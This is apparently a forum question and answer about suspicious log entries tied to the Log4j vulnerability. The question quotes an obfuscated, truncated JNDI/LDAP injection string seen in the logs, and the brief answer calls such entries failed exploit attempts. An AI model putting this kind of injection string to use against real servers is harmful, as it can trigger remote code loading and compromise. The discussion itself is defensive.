We've noticed some suspicious looking log messages of the following or similar format to this: ERROR - Connector: 404 - file not found for file: static/${j${main:\k5:-Nd}i${spring:k5:-:}ldap://$....... We suspect they could be related to the log4J vulnerability. We've already made the necessary updates to our applications to prevent exploitation of the log4J vulnerability, but is there any way to tell if your application has already been successfully exploited?
asked
Charlie Fazackerley
1 answers
1
These appear to be logs of unsuccesful attempts to exploit the log4j vulnerability. If you made the necessary updates, your app is not vulnerable, but there may still be unsuccesful attempts like this.